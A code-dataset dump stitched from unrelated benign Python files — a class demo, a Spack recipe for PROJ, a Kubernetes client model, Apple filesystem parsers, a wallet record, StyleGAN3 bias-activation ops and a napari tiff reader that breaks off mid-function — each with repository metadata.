Function Date : 04 Mar 2021
Function Author : Prasad Dangare
'''
print("Demonstration of Characteristics of Class")
class Demo:
    """Tiny class showing class variables versus instance characteristics."""

    x = 50  # class variable, shared by every instance

    def __init__(self, no1, no2):
        # i and j are per-instance characteristics.
        self.i = no1
        self.j = no2


obj1 = Demo(10, 20)
obj2 = Demo(11, 21)

# Print each instance's own i and j values: 10, 20, 11, 21.
for instance in (obj1, obj2):
    print(instance.i)
    print(instance.j)
print(Demo.x) # 50 No Need To Create Object We Can Directly Access It By Its Class Name | 23.586207 | 87 | 0.660819 |
795462742d21d693970272a4df23c195145ff422 | 2,452 | py | Python | var/spack/repos/builtin/packages/proj/package.py | msimberg/spack | 27a339eeb28007bf0844e4c331bdd7d9da13da2e | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/proj/package.py | msimberg/spack | 27a339eeb28007bf0844e4c331bdd7d9da13da2e | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/proj/package.py | msimberg/spack | 27a339eeb28007bf0844e4c331bdd7d9da13da2e | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Proj(AutotoolsPackage):
    """PROJ is a generic coordinate transformation software, that transforms
    geospatial coordinates from one coordinate reference system (CRS) to
    another. This includes cartographic projections as well as geodetic
    transformations."""

    homepage = "https://proj.org/"
    url = "http://download.osgeo.org/proj/proj-6.1.0.tar.gz"

    maintainers = ['adamjstewart']

    # Version 6 removes projects.h, while version 7 removes proj_api.h.
    # Many packages that depend on proj do not yet support the newer API.
    # See https://github.com/OSGeo/PROJ/wiki/proj.h-adoption-status
    version('6.1.0', sha256='676165c54319d2f03da4349cbd7344eb430b225fe867a90191d848dc64788008')
    version('6.0.0', sha256='4510a2c1c8f9056374708a867c51b1192e8d6f9a5198dd320bf6a168e44a3657')
    version('5.2.0', sha256='ef919499ffbc62a4aae2659a55e2b25ff09cccbbe230656ba71c6224056c7e60')
    version('5.1.0', sha256='6b1379a53317d9b5b8c723c1dc7bf2e3a8eb22ceb46b8807a1ce48ef65685bb3')
    version('5.0.1', sha256='a792f78897482ed2c4e2af4e8a1a02e294c64e32b591a635c5294cb9d49fdc8c')
    version('4.9.2', sha256='60bf9ad1ed1c18158e652dfff97865ba6fb2b67f1511bc8dceae4b3c7e657796')
    version('4.9.1', sha256='fca0388f3f8bc5a1a803d2f6ff30017532367992b30cf144f2d39be88f36c319')
    version('4.8.0', sha256='2db2dbf0fece8d9880679154e0d6d1ce7c694dd8e08b4d091028093d87a9d1b5')
    version('4.7.0', sha256='fc5440002a496532bfaf423c28bdfaf9e26cc96c84ccefcdefde911efbd98986')
    version('4.6.1', sha256='76d174edd4fdb4c49c1c0ed8308a469216c01e7177a4510b1b303ef3c5f97b47')

    # Datum grid files are distributed separately; staged into nad/ so the
    # build can find them (see configure_args below).
    # https://github.com/OSGeo/proj.4#distribution-files-and-format
    # https://github.com/OSGeo/proj-datumgrid
    resource(
        name='proj-datumgrid',
        url='https://download.osgeo.org/proj/proj-datumgrid-1.8.tar.gz',
        sha256='3ff6618a0acc9f0b9b4f6a62e7ff0f7bf538fb4f74de47ad04da1317408fcc15',
        placement='nad'
    )

    # @6 appears to be the first version with dependencies
    depends_on('pkgconfig@0.9.0:', type='build', when='@6:')
    depends_on('sqlite@3.7:', when='@6:')

    def configure_args(self):
        # Point PROJ_LIB at the bundled datum grids staged under nad/.
        return [
            'PROJ_LIB={0}'.format(join_path(self.stage.source_path, 'nad'))
        ]
| 48.078431 | 95 | 0.748777 |
7954631ebc425d6b4034b6313f7deb3c29d19dd9 | 6,428 | py | Python | kubernetes/client/models/v1alpha1_role.py | amanagarwal33/python | e31693557f75950805fb4dc5af4cb7434a470e26 | [
"Apache-2.0"
] | null | null | null | kubernetes/client/models/v1alpha1_role.py | amanagarwal33/python | e31693557f75950805fb4dc5af4cb7434a470e26 | [
"Apache-2.0"
] | null | null | null | kubernetes/client/models/v1alpha1_role.py | amanagarwal33/python | e31693557f75950805fb4dc5af4cb7434a470e26 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: v1.15.6
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class V1alpha1Role(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Maps python attribute name -> declared OpenAPI type string.
    openapi_types = {
        'api_version': 'str',
        'kind': 'str',
        'metadata': 'V1ObjectMeta',
        'rules': 'list[V1alpha1PolicyRule]'
    }

    # Maps python attribute name -> JSON field name on the wire.
    attribute_map = {
        'api_version': 'apiVersion',
        'kind': 'kind',
        'metadata': 'metadata',
        'rules': 'rules'
    }

    def __init__(self, api_version=None, kind=None, metadata=None, rules=None):  # noqa: E501
        """V1alpha1Role - a model defined in OpenAPI"""  # noqa: E501

        self._api_version = None
        self._kind = None
        self._metadata = None
        self._rules = None
        self.discriminator = None

        # Only assign attributes that were explicitly provided, so the
        # property setters run for supplied values only.
        if api_version is not None:
            self.api_version = api_version
        if kind is not None:
            self.kind = kind
        if metadata is not None:
            self.metadata = metadata
        if rules is not None:
            self.rules = rules

    @property
    def api_version(self):
        """Gets the api_version of this V1alpha1Role.  # noqa: E501

        APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources  # noqa: E501

        :return: The api_version of this V1alpha1Role.  # noqa: E501
        :rtype: str
        """
        return self._api_version

    @api_version.setter
    def api_version(self, api_version):
        """Sets the api_version of this V1alpha1Role.

        APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources  # noqa: E501

        :param api_version: The api_version of this V1alpha1Role.  # noqa: E501
        :type: str
        """

        self._api_version = api_version

    @property
    def kind(self):
        """Gets the kind of this V1alpha1Role.  # noqa: E501

        Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds  # noqa: E501

        :return: The kind of this V1alpha1Role.  # noqa: E501
        :rtype: str
        """
        return self._kind

    @kind.setter
    def kind(self, kind):
        """Sets the kind of this V1alpha1Role.

        Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds  # noqa: E501

        :param kind: The kind of this V1alpha1Role.  # noqa: E501
        :type: str
        """

        self._kind = kind

    @property
    def metadata(self):
        """Gets the metadata of this V1alpha1Role.  # noqa: E501

        :return: The metadata of this V1alpha1Role.  # noqa: E501
        :rtype: V1ObjectMeta
        """
        return self._metadata

    @metadata.setter
    def metadata(self, metadata):
        """Sets the metadata of this V1alpha1Role.

        :param metadata: The metadata of this V1alpha1Role.  # noqa: E501
        :type: V1ObjectMeta
        """

        self._metadata = metadata

    @property
    def rules(self):
        """Gets the rules of this V1alpha1Role.  # noqa: E501

        Rules holds all the PolicyRules for this Role  # noqa: E501

        :return: The rules of this V1alpha1Role.  # noqa: E501
        :rtype: list[V1alpha1PolicyRule]
        """
        return self._rules

    @rules.setter
    def rules(self, rules):
        """Sets the rules of this V1alpha1Role.

        Rules holds all the PolicyRules for this Role  # noqa: E501

        :param rules: The rules of this V1alpha1Role.  # noqa: E501
        :type: list[V1alpha1PolicyRule]
        """

        self._rules = rules

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # Recursively convert nested models, lists and dicts of models.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, V1alpha1Role):
            return False

        # Compares all private attribute storage, not just declared fields.
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| 31.665025 | 295 | 0.609365 |
795463357272c02290426801460f72f08f43a72f | 5,621 | py | Python | isolyzer/apple.py | KBNLresearch/isolyzer | 07f74991bd22b7f21b5f7e6af3625dfb4cb28ced | [
"Apache-2.0"
] | 19 | 2017-05-02T03:43:28.000Z | 2022-02-09T22:22:33.000Z | isolyzer/apple.py | KBNLresearch/isolyzer | 07f74991bd22b7f21b5f7e6af3625dfb4cb28ced | [
"Apache-2.0"
] | 19 | 2017-04-19T13:55:06.000Z | 2022-03-09T01:33:54.000Z | isolyzer/apple.py | KBNLresearch/isolyzer | 07f74991bd22b7f21b5f7e6af3625dfb4cb28ced | [
"Apache-2.0"
] | 5 | 2017-06-04T15:39:02.000Z | 2022-03-04T22:19:37.000Z | #! /usr/bin/env python
"""Parser functions for Apple file systems"""
import xml.etree.ElementTree as ET
from . import byteconv as bc
from . import shared as shared
def parseZeroBlock(bytesData):
    """Parse Zero Block and return extracted properties"""
    # Based on code at:
    # https://opensource.apple.com/source/IOStorageFamily/IOStorageFamily-116/IOApplePartitionScheme.h

    # Field table: (property name, converter, start offset, end offset).
    fields = [
        ("signature", bc.bytesToText, 0, 2),
        ("blockSize", bc.bytesToUShortInt, 2, 4),
        ("blockCount", bc.bytesToUInt, 4, 8),
        ("deviceType", bc.bytesToUShortInt, 8, 10),
        ("deviceID", bc.bytesToUShortInt, 10, 12),
        ("driverData", bc.bytesToUInt, 12, 16),
        ("driverDescriptorCount", bc.bytesToUShortInt, 80, 82),
        ("driverDescriptorBlockStart", bc.bytesToUInt, 82, 86),
        ("driverDescriptorBlockCount", bc.bytesToUShortInt, 86, 88),
        ("driverDescriptorSystemType", bc.bytesToUShortInt, 88, 90),
    ]

    # Element object that collects the extracted properties.
    properties = ET.Element("appleZeroBlock")
    for name, convert, start, end in fields:
        shared.addProperty(properties, name, convert(bytesData[start:end]))
    return properties
def parsePartitionMap(bytesData):
    """Parse Partition Map and return extracted properties"""
    # Based on description at:
    # https://en.wikipedia.org/wiki/Apple_Partition_Map#Layout
    # and code at:
    # https://opensource.apple.com/source/IOStorageFamily/IOStorageFamily-116/IOApplePartitionScheme.h
    # Variable naming mostly follows Apple's code.

    # Field table: (property name, converter, start offset, end offset).
    fields = [
        ("signature", bc.bytesToText, 0, 2),
        ("numberOfPartitionEntries", bc.bytesToUInt, 4, 8),
        ("partitionBlockStart", bc.bytesToUInt, 8, 12),
        ("partitionBlockCount", bc.bytesToUInt, 12, 16),
        ("partitionName", bc.bytesToText, 16, 48),
        ("partitionType", bc.bytesToText, 48, 80),
        ("partitionLogicalBlockStart", bc.bytesToUInt, 80, 84),
        ("partitionLogicalBlockCount", bc.bytesToUInt, 84, 88),
        ("partitionFlags", bc.bytesToUInt, 88, 92),
        ("bootCodeBlockStart", bc.bytesToUInt, 92, 96),
        ("bootCodeSizeInBytes", bc.bytesToUInt, 96, 100),
        ("bootCodeLoadAddress", bc.bytesToUInt, 100, 104),
        ("bootCodeJumpAddress", bc.bytesToUInt, 108, 112),
        ("bootCodeChecksum", bc.bytesToUInt, 116, 120),
        ("processorType", bc.bytesToText, 120, 136),
    ]

    # Element object that collects the extracted properties.
    properties = ET.Element("applePartitionMap")
    for name, convert, start, end in fields:
        shared.addProperty(properties, name, convert(bytesData[start:end]))
    return properties
def parseMasterDirectoryBlock(bytesData):
    """Parse Master Directory Block and return extracted properties"""
    # Based on description at:
    # https://developer.apple.com/legacy/library/documentation/mac/Files/Files-102.html
    # and https://github.com/libyal/libfshfs/blob/master/documentation/Hierarchical%20File%20System%20(HFS).asciidoc
    properties = ET.Element("masterDirectoryBlock")

    shared.addProperty(properties, "signature", bc.bytesToText(bytesData[0:2]))
    shared.addProperty(properties, "blockSize", bc.bytesToUShortInt(bytesData[18:20]))
    shared.addProperty(properties, "blockCount", bc.bytesToUInt(bytesData[20:24]))

    # The volume name is stored Pascal-style: a length byte at offset 36,
    # followed by that many characters.
    nameLength = bc.bytesToUnsignedChar(bytesData[36:37])
    shared.addProperty(properties, "volumeName",
                       bc.bytesToText(bytesData[37:37 + nameLength]))
    return properties
def parseHFSPlusVolumeHeader(bytesData):
    """Parse HFS Plus Volume header and return extracted properties"""
    # Based on https://opensource.apple.com/source/xnu/xnu-344/bsd/hfs/hfs_format.h

    # Field table: (property name, converter, start offset, end offset).
    fields = [
        ("signature", bc.bytesToText, 0, 2),
        ("version", bc.bytesToUShortInt, 2, 4),
        ("blockSize", bc.bytesToUInt, 40, 44),
        ("blockCount", bc.bytesToUInt, 44, 48),
    ]

    # Element object that collects the extracted properties.
    properties = ET.Element("hfsPlusVolumeheader")
    for name, convert, start, end in fields:
        shared.addProperty(properties, name, convert(bytesData[start:end]))
    return properties
| 41.637037 | 116 | 0.66127 |
79546409653190e33990a9a45bfe0a7a0fd31a11 | 552 | py | Python | melon/wallet/derivation_record.py | ninroi/Rio | 123ea10ec1643203efbac61f401f5db58d11466b | [
"Apache-2.0"
] | 4 | 2021-12-05T11:36:17.000Z | 2022-02-19T09:30:02.000Z | melon/wallet/derivation_record.py | ninroi/Rio | 123ea10ec1643203efbac61f401f5db58d11466b | [
"Apache-2.0"
] | 15 | 2021-11-02T12:14:25.000Z | 2022-03-29T12:14:36.000Z | melon/wallet/derivation_record.py | ninroi/Rio | 123ea10ec1643203efbac61f401f5db58d11466b | [
"Apache-2.0"
] | 4 | 2021-11-21T02:11:34.000Z | 2022-03-15T08:37:47.000Z | from dataclasses import dataclass
from blspy import G1Element
from melon.types.blockchain_format.sized_bytes import bytes32
from melon.util.ints import uint32
from melon.wallet.util.wallet_types import WalletType
@dataclass(frozen=True)
class DerivationRecord:
    """
    These are records representing a puzzle hash, which is generated from a
    public key, derivation index, and wallet type. Stored in the puzzle_store.
    """

    # Derivation index this record was generated at.
    index: uint32
    # Puzzle hash for this derivation.
    puzzle_hash: bytes32
    # Public key associated with the puzzle hash.
    pubkey: G1Element
    # Type of the owning wallet.
    wallet_type: WalletType
    # Identifier of the owning wallet.
    wallet_id: uint32
| 25.090909 | 78 | 0.768116 |
795464d0b4f16fb700bdd2ccf3ad18ce080a7195 | 9,418 | py | Python | thirdparty/stylegan3_ops/ops/bias_act.py | STomoya/animeface | 37b3cd26097d7874559d4c152e41e5712b7a1a42 | [
"MIT"
] | 61 | 2020-06-06T08:25:09.000Z | 2022-03-28T13:30:10.000Z | thirdparty/stylegan3_ops/ops/bias_act.py | OrigamiXx/animeface | 8724006df99ba7ef369e837d8294350ea733611b | [
"MIT"
] | 13 | 2020-07-02T02:41:14.000Z | 2021-05-09T14:24:58.000Z | thirdparty/stylegan3_ops/ops/bias_act.py | OrigamiXx/animeface | 8724006df99ba7ef369e837d8294350ea733611b | [
"MIT"
] | 8 | 2020-10-03T18:51:16.000Z | 2022-02-05T18:18:01.000Z | # Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
"""Custom PyTorch ops for efficient bias and activation."""
import os
import numpy as np
import torch
# import dnnlib
from utils import EasyDict
from .. import custom_ops
from .. import misc
#----------------------------------------------------------------------------
activation_funcs = {
'linear': EasyDict(func=lambda x, **_: x, def_alpha=0, def_gain=1, cuda_idx=1, ref='', has_2nd_grad=False),
'relu': EasyDict(func=lambda x, **_: torch.nn.functional.relu(x), def_alpha=0, def_gain=np.sqrt(2), cuda_idx=2, ref='y', has_2nd_grad=False),
'lrelu': EasyDict(func=lambda x, alpha, **_: torch.nn.functional.leaky_relu(x, alpha), def_alpha=0.2, def_gain=np.sqrt(2), cuda_idx=3, ref='y', has_2nd_grad=False),
'tanh': EasyDict(func=lambda x, **_: torch.tanh(x), def_alpha=0, def_gain=1, cuda_idx=4, ref='y', has_2nd_grad=True),
'sigmoid': EasyDict(func=lambda x, **_: torch.sigmoid(x), def_alpha=0, def_gain=1, cuda_idx=5, ref='y', has_2nd_grad=True),
'elu': EasyDict(func=lambda x, **_: torch.nn.functional.elu(x), def_alpha=0, def_gain=1, cuda_idx=6, ref='y', has_2nd_grad=True),
'selu': EasyDict(func=lambda x, **_: torch.nn.functional.selu(x), def_alpha=0, def_gain=1, cuda_idx=7, ref='y', has_2nd_grad=True),
'softplus': EasyDict(func=lambda x, **_: torch.nn.functional.softplus(x), def_alpha=0, def_gain=1, cuda_idx=8, ref='y', has_2nd_grad=True),
'swish': EasyDict(func=lambda x, **_: torch.sigmoid(x) * x, def_alpha=0, def_gain=np.sqrt(2), cuda_idx=9, ref='x', has_2nd_grad=True),
}
#----------------------------------------------------------------------------
_plugin = None
_null_tensor = torch.empty([0])
def _init():
    """Lazily compile/load the fused bias_act CUDA plugin on first use.

    Returns True once the plugin is available; subsequent calls reuse the
    cached module. NOTE(review): presumably get_plugin raises on build
    failure rather than returning None — confirm in custom_ops.
    """
    global _plugin
    if _plugin is None:
        _plugin = custom_ops.get_plugin(
            module_name='bias_act_plugin',
            sources=['bias_act.cpp', 'bias_act.cu'],
            headers=['bias_act.h'],
            source_dir=os.path.dirname(__file__),
            extra_cuda_cflags=['--use_fast_math'],
        )
    return True
#----------------------------------------------------------------------------
def bias_act(x, b=None, dim=1, act='linear', alpha=None, gain=None, clamp=None, impl='cuda'):
    r"""Fused bias and activation function.

    Adds bias `b` to `x`, applies activation `act`, scales the result by
    `gain`, and optionally clamps it — fused into a single op when the CUDA
    plugin is available, which is considerably faster than separate PyTorch
    ops. First and second order gradients are supported, third order is not.

    Args:
        x:     Input activation tensor. Can be of any shape.
        b:     Bias vector, or `None` to disable. Must be a 1D tensor of the
               same type as `x`, with length matching dimension `dim` of `x`.
        dim:   The dimension in `x` corresponding to the elements of `b`.
               Ignored if `b` is not specified.
        act:   Activation name from `activation_funcs` (e.g. `"relu"`,
               `"lrelu"`, `"tanh"`); `"linear"` disables the activation.
        alpha: Shape parameter for the activation, or `None` for its default.
        gain:  Output scale factor, or `None` for the activation's default.
        clamp: Clamp output values to `[-clamp, +clamp]`, or `None` to
               disable clamping (default).
        impl:  Implementation to use: `"ref"` or `"cuda"` (default).

    Returns:
        Tensor of the same shape and datatype as `x`.
    """
    assert isinstance(x, torch.Tensor)
    assert impl in ['ref', 'cuda']
    # Use the compiled kernel only when requested, on a CUDA tensor, and when
    # the plugin actually loads; otherwise fall back to the reference path.
    use_cuda = impl == 'cuda' and x.device.type == 'cuda' and _init()
    if use_cuda:
        return _bias_act_cuda(dim=dim, act=act, alpha=alpha, gain=gain, clamp=clamp).apply(x, b)
    return _bias_act_ref(x=x, b=b, dim=dim, act=act, alpha=alpha, gain=gain, clamp=clamp)
#----------------------------------------------------------------------------
@misc.profiled_function
def _bias_act_ref(x, b=None, dim=1, act='linear', alpha=None, gain=None, clamp=None):
    """Slow reference implementation of `bias_act()` using plain PyTorch ops."""
    assert isinstance(x, torch.Tensor)
    assert clamp is None or clamp >= 0
    act_spec = activation_funcs[act]
    alpha = float(alpha if alpha is not None else act_spec.def_alpha)
    gain = float(gain if gain is not None else act_spec.def_gain)
    clamp = float(clamp if clamp is not None else -1)

    # Add bias, broadcasting it along every axis except `dim`.
    if b is not None:
        assert isinstance(b, torch.Tensor) and b.ndim == 1
        assert 0 <= dim < x.ndim
        assert b.shape[0] == x.shape[dim]
        broadcast_shape = [-1 if axis == dim else 1 for axis in range(x.ndim)]
        x = x + b.reshape(broadcast_shape)

    # Apply the activation function.
    alpha = float(alpha)
    x = act_spec.func(x, alpha=alpha)

    # Apply the output gain.
    gain = float(gain)
    if gain != 1:
        x = x * gain

    # Apply the symmetric clamp (clamp < 0 means disabled).
    if clamp >= 0:
        x = x.clamp(-clamp, clamp)  # pylint: disable=invalid-unary-operand-type
    return x
#----------------------------------------------------------------------------
# Cache of generated autograd op classes, keyed by (dim, act, alpha, gain, clamp).
_bias_act_cuda_cache = dict()

def _bias_act_cuda(dim=1, act='linear', alpha=None, gain=None, clamp=None):
    """Fast CUDA implementation of `bias_act()` using custom ops.

    Returns a torch.autograd.Function subclass specialized for the given
    parameters; call `.apply(x, b)` on it.
    """
    # Parse arguments.
    assert clamp is None or clamp >= 0
    spec = activation_funcs[act]
    alpha = float(alpha if alpha is not None else spec.def_alpha)
    gain = float(gain if gain is not None else spec.def_gain)
    clamp = float(clamp if clamp is not None else -1)

    # Lookup from cache.
    key = (dim, act, alpha, gain, clamp)
    if key in _bias_act_cuda_cache:
        return _bias_act_cuda_cache[key]

    # Forward op.
    class BiasActCuda(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x, b): # pylint: disable=arguments-differ
            # Keep channels-last layout when the input's stride pattern
            # suggests it; the kernel honors the chosen memory format.
            ctx.memory_format = torch.channels_last if x.ndim > 2 and x.stride(1) == 1 else torch.contiguous_format
            x = x.contiguous(memory_format=ctx.memory_format)
            b = b.contiguous() if b is not None else _null_tensor
            y = x
            # Skip the kernel entirely when the whole op is an identity.
            if act != 'linear' or gain != 1 or clamp >= 0 or b is not _null_tensor:
                y = _plugin.bias_act(x, b, _null_tensor, _null_tensor, _null_tensor, 0, dim, spec.cuda_idx, alpha, gain, clamp)
            # Save only what the backward pass needs, per the activation spec.
            ctx.save_for_backward(
                x if 'x' in spec.ref or spec.has_2nd_grad else _null_tensor,
                b if 'x' in spec.ref or spec.has_2nd_grad else _null_tensor,
                y if 'y' in spec.ref else _null_tensor)
            return y

        @staticmethod
        def backward(ctx, dy): # pylint: disable=arguments-differ
            dy = dy.contiguous(memory_format=ctx.memory_format)
            x, b, y = ctx.saved_tensors
            dx = None
            db = None

            if ctx.needs_input_grad[0] or ctx.needs_input_grad[1]:
                dx = dy
                if act != 'linear' or gain != 1 or clamp >= 0:
                    dx = BiasActCudaGrad.apply(dy, x, b, y)

            if ctx.needs_input_grad[1]:
                # Bias gradient: reduce over every dim except the bias dim.
                db = dx.sum([i for i in range(dx.ndim) if i != dim])

            return dx, db

    # Backward op (differentiable itself, enabling second-order gradients).
    class BiasActCudaGrad(torch.autograd.Function):
        @staticmethod
        def forward(ctx, dy, x, b, y): # pylint: disable=arguments-differ
            ctx.memory_format = torch.channels_last if dy.ndim > 2 and dy.stride(1) == 1 else torch.contiguous_format
            # Kernel grad mode 1: first-order gradient.
            dx = _plugin.bias_act(dy, b, x, y, _null_tensor, 1, dim, spec.cuda_idx, alpha, gain, clamp)
            ctx.save_for_backward(
                dy if spec.has_2nd_grad else _null_tensor,
                x, b, y)
            return dx

        @staticmethod
        def backward(ctx, d_dx): # pylint: disable=arguments-differ
            d_dx = d_dx.contiguous(memory_format=ctx.memory_format)
            dy, x, b, y = ctx.saved_tensors
            d_dy = None
            d_x = None
            d_b = None
            d_y = None

            if ctx.needs_input_grad[0]:
                d_dy = BiasActCudaGrad.apply(d_dx, x, b, y)

            if spec.has_2nd_grad and (ctx.needs_input_grad[1] or ctx.needs_input_grad[2]):
                # Kernel grad mode 2: second-order gradient.
                d_x = _plugin.bias_act(d_dx, b, x, y, dy, 2, dim, spec.cuda_idx, alpha, gain, clamp)

            if spec.has_2nd_grad and ctx.needs_input_grad[2]:
                d_b = d_x.sum([i for i in range(d_x.ndim) if i != dim])

            return d_dy, d_x, d_b, d_y

    # Add to cache.
    _bias_act_cuda_cache[key] = BiasActCuda
    return BiasActCuda
#----------------------------------------------------------------------------
| 45.941463 | 178 | 0.568061 |
795464e94c2f799c9fde2deae9ce33cbec59e935 | 5,967 | py | Python | napari_ndtiffs/reader.py | neuromusic/napari-ndtiffs | 7e89e5b2e5291631daf4e962d43e51757a2b1797 | [
"BSD-3-Clause"
] | 7 | 2020-06-18T19:42:17.000Z | 2022-01-06T02:20:53.000Z | napari_ndtiffs/reader.py | neuromusic/napari-ndtiffs | 7e89e5b2e5291631daf4e962d43e51757a2b1797 | [
"BSD-3-Clause"
] | 6 | 2020-09-10T17:15:18.000Z | 2022-01-20T21:22:45.000Z | napari_ndtiffs/reader.py | neuromusic/napari-ndtiffs | 7e89e5b2e5291631daf4e962d43e51757a2b1797 | [
"BSD-3-Clause"
] | 3 | 2020-09-10T17:21:18.000Z | 2021-12-21T03:28:34.000Z | """Plugin to read lattice light sheet folders into napari."""
import glob
import logging
import os
import re
import zipfile
from contextlib import contextmanager
from typing import Any, Callable, Dict, List, Tuple, Union
import numpy as np
from dask import array as da
from dask import delayed
from tifffile import TiffFile, imread
from .affine import get_deskew_func
from .settingstxt import parse_settings
logger = logging.getLogger(__name__)
logging.getLogger("tifffile").setLevel(logging.CRITICAL)
LayerData = Union[Tuple[Any], Tuple[Any, Dict], Tuple[Any, Dict, str]]
PathLike = Union[str, List[str]]
ReaderFunction = Callable[[PathLike], List[LayerData]]
# this dict holds any parameter overrides that the user wants
OVERRIDES: Dict[str, Any] = {}


@contextmanager
def parameter_override(**kwargs):
    """Temporarily apply reader parameter overrides (e.g. dx, dz, angle).

    The previous override state is restored on exit — including when the
    `with` body raises (the original version skipped restoration on error,
    leaving the overrides permanently applied).
    """
    global OVERRIDES
    old = OVERRIDES.copy()
    OVERRIDES.update(kwargs)
    try:
        yield
    finally:
        OVERRIDES = old
lls_pattern = re.compile(
r"""
^(?![_.]) # don't start with _ or .
.*
_ch(?P<channel>\d{1})
_stack(?P<stack>\d{4})
_(?P<wave>[^_]+)
_(?P<reltime>\d{7})msec
_.*\.tiff?$""", # ends with tif or tiff
re.VERBOSE,
)
read_counter = 0
def noisy_imread(path, in_zip=None):
    """Read a tiff (optionally from inside a zip archive), logging each read.

    To see the log output, set:
    logging.getLogger("napari_ndtiffs").setLevel(logging.DEBUG)
    """
    global read_counter
    read_counter += 1
    logger.debug(f"reading {path}, (read count: {read_counter})")
    if not in_zip:
        return imread(path)
    with zipfile.ZipFile(in_zip) as zf:
        with zf.open(path, "r") as f:
            return imread(f)


lazy_imread = delayed(noisy_imread)  # lazy reader
def alphanumeric_key(s):
    """Split *s* into text/integer chunks so it sorts in natural order."""
    key = []
    for chunk in re.split("([0-9]+)", s):
        key.append(int(chunk) if chunk.isdigit() else chunk)
    return key
def has_lls_data(path):
    """Return True if *path* (folder or zip) holds lattice-light-sheet tiffs."""
    path = os.path.abspath(path)
    if zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as zf:
            names = zf.namelist()
    elif os.path.isdir(path):
        names = os.listdir(path)
    else:
        return False

    for name in names:
        if not name.endswith((".tif", ".tiff")):
            continue
        match = lls_pattern.match(name)
        if match is None:
            continue
        groups = match.groupdict()
        # Need both a channel and a stack index to call it LLS data.
        if groups.get("channel") and groups.get("stack"):
            return True
    return False
def get_tiff_meta(
    path: str, in_zip: str = None
) -> Tuple[Tuple[int, ...], np.dtype, float, float, Tuple[int, int]]:
    """Read (shape, dtype, dx, dz, clims) from a single tiff stack.

    shape has the page count as its first axis; dx/dz fall back to 1.0 when
    the corresponding tags are absent.
    """
    dx, dz = 1.0, 1.0
    if in_zip:
        # Re-enter with the open file object taken from the archive.
        with zipfile.ZipFile(in_zip) as zf:
            with zf.open(path, "r") as f:
                return get_tiff_meta(f)
    with TiffFile(path) as tfile:
        nz = len(tfile.pages)
        if not nz:
            raise ValueError(f"tiff file {path} has no pages!")
        first_page = tfile.pages[0]
        shape = (nz,) + first_page.shape
        dtype = first_page.dtype
        # XResolution is a (numerator, denominator) rational; the pixel size
        # is its reciprocal.
        _dx = first_page.tags.get("XResolution")
        if hasattr(_dx, "value"):
            dx = 1 / np.divide(*_dx.value)
        # The description may embed the z spacing, e.g. "spacing=0.3"
        # (ImageJ-style metadata — TODO confirm for other writers).
        desc = first_page.tags.get("ImageDescription")
        if hasattr(desc, "value"):
            match = re.search(r"spacing=([\d\.]+)", desc.value)
            if match:
                dz = float(match.groups()[0])
        # Sample three pages to estimate contrast limits cheaply.
        sample = tfile.asarray(key=(nz // 4, nz // 2, 3 * nz // 4))
        clims = sample.min(), sample.max()
    return shape, dtype, dx, dz, clims
def reader_function(path: PathLike) -> List[LayerData]:
    """Take a path or list of paths and return a list of LayerData tuples."""
    # Acquisition parameters from Settings.txt are optional.
    try:
        settings = parse_settings(path)
    except FileNotFoundError:
        settings = {}
    in_zip = str(path) if zipfile.is_zipfile(path) else None

    # Group tiff files per channel: channel id -> (wavelength, [filenames]).
    channels = dict()
    if in_zip:
        with zipfile.ZipFile(path) as zf:
            filelist = zf.namelist()
    else:
        filelist = glob.glob(os.path.join(path, "*.tif"))
    for fname in filelist:
        match = lls_pattern.match(fname)
        if match:
            gdict = match.groupdict()
            if gdict.get("channel") not in channels:
                channels[gdict.get("channel")] = (gdict.get("wave"), [])
            channels[gdict.get("channel")][1].append(fname)

    data = []
    names = []
    clims = []
    for i in sorted(channels.keys()):
        wave, filenames = channels[i]
        names.append(wave)
        # Metadata from the first file stands in for the whole channel.
        # NOTE(review): dx/dz/shape keep the values from the LAST channel
        # processed — assumes all channels share geometry; confirm.
